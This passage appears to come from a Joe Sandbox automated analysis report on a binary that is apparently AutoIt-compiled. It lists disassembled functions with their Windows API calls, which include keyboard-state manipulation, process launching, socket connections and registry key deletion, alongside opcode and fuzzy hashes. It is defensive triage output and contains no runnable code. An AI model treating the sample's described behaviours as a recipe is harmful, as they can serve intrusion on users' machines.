                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 73025fb56e55d634e2e7984741e4999d8e424325852cdbb553c2f86fb4262bed
                    • Instruction ID: a77f8246ada72176a6ad78a5d84da363b065db4c2a700b6a5d3f552faa7b6e5f
                    • Opcode Fuzzy Hash: 73025fb56e55d634e2e7984741e4999d8e424325852cdbb553c2f86fb4262bed
                    • Instruction Fuzzy Hash: 0E216872A41206BBE615A522DDCBFBF239CDF20394B0C4019FE1D96282E751DE1591B5
                    Function 00CDD7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CoInitialize.OLE32(00000000), ref: 00CDD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CDD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00CDD8FC
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CDD9B7
                    • _memset.LIBCMT ref: 00CDDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00CDDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CDDAAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                    • String ID:
                    • API String ID: 3008154123-0
                    • Opcode ID: c5c73f820547fa24b4f46dd5804a1afa42d0aa796a0bfd3fc6b0ea6963602a5b
                    • Instruction ID: 2d34b8ce7c702d2a8d810cece556673ba2aaae3b58ac8897b36fc8cb4a564fa8
                    • Opcode Fuzzy Hash: c5c73f820547fa24b4f46dd5804a1afa42d0aa796a0bfd3fc6b0ea6963602a5b
                    • Instruction Fuzzy Hash: 35B1EC75A00109AFDB14DFA4C888EAEBBB9FF48314B148469F50AEB351DB30EE45DB51
                    Function 00C71424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ce89a020b6375e3fb0992e5918fcab1a14443de532ed8d044145a64c73077bf
                    • Instruction ID: 8dac9620f71dd9bdcd98ee9414037ab9c3f81da36d78f20efb4f94f06e10010d
                    • Opcode Fuzzy Hash: 1ce89a020b6375e3fb0992e5918fcab1a14443de532ed8d044145a64c73077bf
                    • Instruction Fuzzy Hash: BE716D30900109EFDB14DF99CC49EBEBBB9FF86314F18C159F919AA251C734AA51DBA0
                    Function 00CFB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(00882760), ref: 00CFB6A5
                    • IsWindowEnabled.USER32(00882760), ref: 00CFB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CFB795
                    • SendMessageW.USER32(00882760,000000B0,?,?), ref: 00CFB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00CFB809
                    • GetWindowLongW.USER32(00882760,000000EC), ref: 00CFB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CFB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 8bed8411cd0b603b1e0361631db1d5ab402be5ff028c71c40a30e43cf5befc02
                    • Instruction ID: 5f4ccc3a8d4838e32042bdcdd5792b4b5349244a0082c94ce83a4005ffa2890c
                    • Opcode Fuzzy Hash: 8bed8411cd0b603b1e0361631db1d5ab402be5ff028c71c40a30e43cf5befc02
                    • Instruction Fuzzy Hash: C371C374604208AFDB64AF64C894FBA7BB9FF49300F14405AFA65D73A1C731AE41DB62
                    Function 00CE86D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CoInitialize.OLE32 ref: 00CE8718
                    • VariantInit.OLEAUT32(?), ref: 00CE8890
                    • VariantClear.OLEAUT32(?), ref: 00CE88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 4106155388-1287834457
                    • Opcode ID: 39d8f2e37f66fd92fdbc5ef94577bd4b1934607c20ba3fd25126db6a9e1dab3f
                    • Instruction ID: 502fb6b3f0e0c4697818e2c4b128875d6e0402251252fb2ef2dbd0d1853b9ed7
                    • Opcode Fuzzy Hash: 39d8f2e37f66fd92fdbc5ef94577bd4b1934607c20ba3fd25126db6a9e1dab3f
                    • Instruction Fuzzy Hash: 3361AE706083519FD720DF26C849B6EBBE8EF49714F10481DF9999B291CB70EE48DB92
                    Function 00CEF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CEF75C
                    • _memset.LIBCMT ref: 00CEF825
                    • ShellExecuteExW.SHELL32(?), ref: 00CEF86A
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00CEF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00CEF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: c0ca50b38e2416216dcf69656983bb5c6043fcc88067cda883e1232bddea0bfa
                    • Instruction ID: 667da19eca8a9f26665c1b1b8bb3569061099af512dd98074aa25253759a5c47
                    • Opcode Fuzzy Hash: c0ca50b38e2416216dcf69656983bb5c6043fcc88067cda883e1232bddea0bfa
                    • Instruction Fuzzy Hash: C461A075A00659DFCF14DF55C485AAEBBF4FF48310B14846DE85AAB391CB30AE42DB90
                    Function 00CD145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 00CD149C
                    • GetKeyboardState.USER32(?), ref: 00CD14B1
                    • SetKeyboardState.USER32(?), ref: 00CD1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 1edf52afb037f703e68625a0114bd010dd948971f8939d1990d9352f26c060aa
                    • Instruction ID: 0aa73c463491237f88a12c9fe0515dd68e2b5d56a621fa0f22942202591754ee
                    • Opcode Fuzzy Hash: 1edf52afb037f703e68625a0114bd010dd948971f8939d1990d9352f26c060aa
                    • Instruction Fuzzy Hash: AD5114A06043D53DFB3646348C45BBABEE95B42304F0C848EFAE545AD2D298EE85D750
                    Function 00CD1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 00CD12B5
                    • GetKeyboardState.USER32(?), ref: 00CD12CA
                    • SetKeyboardState.USER32(?), ref: 00CD132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 9ad8e29ccb9c33719603f0a5052ab7db493bc896b33ded061089f30c5efe7299
                    • Instruction ID: 50b704ac651b53597520141407afe0635a210d1582711f60b2a2a18c0cf2fb11
                    • Opcode Fuzzy Hash: 9ad8e29ccb9c33719603f0a5052ab7db493bc896b33ded061089f30c5efe7299
                    • Instruction Fuzzy Hash: 455103A05047D57DFB3287248C45B7ABFA95F06300F0C848AEAE44AAD2D395EE94E751
                    Function 00CD589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: 5804f9cdee503636adecddc7b5c68638e3f642cf75d5a40143691fd68409b169
                    • Instruction ID: 2bcfcd40fba2d24c05d4bbe66bb5a82ada915631ea1f7f3c3c7fa60e5cd84f6f
                    • Opcode Fuzzy Hash: 5804f9cdee503636adecddc7b5c68638e3f642cf75d5a40143691fd68409b169
                    • Instruction Fuzzy Hash: 30416265C2052876CF11EBF4888AEDFB3A8AF05310F508557F618E3221E734E716D7AA
                    Function 00CD38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD38D3,?), ref: 00CD48C7
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD38D3,?), ref: 00CD48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00CD38F3
                    • _wcscmp.LIBCMT ref: 00CD390F
                    • MoveFileW.KERNEL32(?,?), ref: 00CD3927
                    • _wcscat.LIBCMT ref: 00CD396F
                    • SHFileOperationW.SHELL32(?), ref: 00CD39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: fd80213745a17c4436f21bf502c6ba9ca142d4997e8ec1a9bd0ab75dbc682c0d
                    • Instruction ID: 4f7ecdaf8df48ff10faed300a2a7e50f253cdf9aa3fac6350ae3053563df4592
                    • Opcode Fuzzy Hash: fd80213745a17c4436f21bf502c6ba9ca142d4997e8ec1a9bd0ab75dbc682c0d
                    • Instruction Fuzzy Hash: 38418DB15093849AC751EF64C895AEFB7E8AF88340F04092FB599C32A1EA74D748C753
                    Function 00CF7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CF7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CF75C0
                    • IsMenu.USER32(?), ref: 00CF75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CF7620
                    • DrawMenuBar.USER32 ref: 00CF7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 3edcb2d9a2e9aa69717291baef7a4bf0c80ff4494b3170b6b163040d4e6be8bf
                    • Instruction ID: 45c58c5e75e2770fef721a8fc37805511d57535b3b57f3f70b22606cdb218600
                    • Opcode Fuzzy Hash: 3edcb2d9a2e9aa69717291baef7a4bf0c80ff4494b3170b6b163040d4e6be8bf
                    • Instruction Fuzzy Hash: 28411A75A04609AFDB50DF94D884EAABBB4FF08350F148129FA2597750D730AE50CFA1
                    Function 00CF122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CF125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF1286
                    • FreeLibrary.KERNEL32(00000000), ref: 00CF133D
                      • Part of subcall function 00CF122D: RegCloseKey.ADVAPI32(?), ref: 00CF12A3
                      • Part of subcall function 00CF122D: FreeLibrary.KERNEL32(?), ref: 00CF12F5
                      • Part of subcall function 00CF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CF1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CF12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: f71cbf94ed75aee730b0c12bb73f1a48a71bf5878138b404940e74dfbb836aab
                    • Instruction ID: c4e1ed1cc9667c04b1200cf44c6148c36de4dd920f6a814e5479fe9e34c56e84
                    • Opcode Fuzzy Hash: f71cbf94ed75aee730b0c12bb73f1a48a71bf5878138b404940e74dfbb836aab
                    • Instruction Fuzzy Hash: 4B311AB190110DFFDB549B90DC89AFEB7BCEF08300F040169EA12E2151EA749F499AA5
                    Function 00CF653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CF655B
                    • GetWindowLongW.USER32(00882760,000000F0), ref: 00CF658E
                    • GetWindowLongW.USER32(00882760,000000F0), ref: 00CF65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CF65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CF661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CF6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CF664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9a6877d8972ef488913dda0c3062d21e83770223ef6ab51a1f8669378c827346
                    • Instruction ID: a8026acca2ba70364d1d24e2d1e938e984f6fc028c7a285608bf1dc97a3fdcf3
                    • Opcode Fuzzy Hash: 9a6877d8972ef488913dda0c3062d21e83770223ef6ab51a1f8669378c827346
                    • Instruction Fuzzy Hash: F9310131604218AFDB618F18DC84F693BE1FB4A750F1941A8F621DB2B6CB71ED40DB62
                    Function 00CE6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CE80A0: inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00CE64D9
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE64E8
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00CE6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00CE652A
                    • WSAGetLastError.WS2_32 ref: 00CE6534
                    • closesocket.WS2_32(00000000), ref: 00CE655D
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00CE6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 2687a52560abf1b8fb2a43861a61784462c639408e91daa44e0c1aaf7eb9cdb0
                    • Instruction ID: 4c59ba00f09484dfdb5c20fa0bf31d3ca09e968ed05d7b0a8e864afe3a0931f6
                    • Opcode Fuzzy Hash: 2687a52560abf1b8fb2a43861a61784462c639408e91daa44e0c1aaf7eb9cdb0
                    • Instruction Fuzzy Hash: 7731D131610218AFDB10AF25CC85BBE7BB8EF553A4F008029F909972D1CB74AD05DBA2
                    Function 00CCFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 8de05f725ab6eaae36ff2a85ed7bac11ebcbbe7a1353500b4443d950fafe71e1
                    • Instruction ID: b6332193de0a8d95313236e3d776b5051653521ff444e1ee8a3b57e68485b8bd
                    • Opcode Fuzzy Hash: 8de05f725ab6eaae36ff2a85ed7bac11ebcbbe7a1353500b4443d950fafe71e1
                    • Instruction Fuzzy Hash: 91213732204155ABD630A725DC26FBB73E9EF51340F54803EF89986181EB52AF83E2A5
                    Function 00CF783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
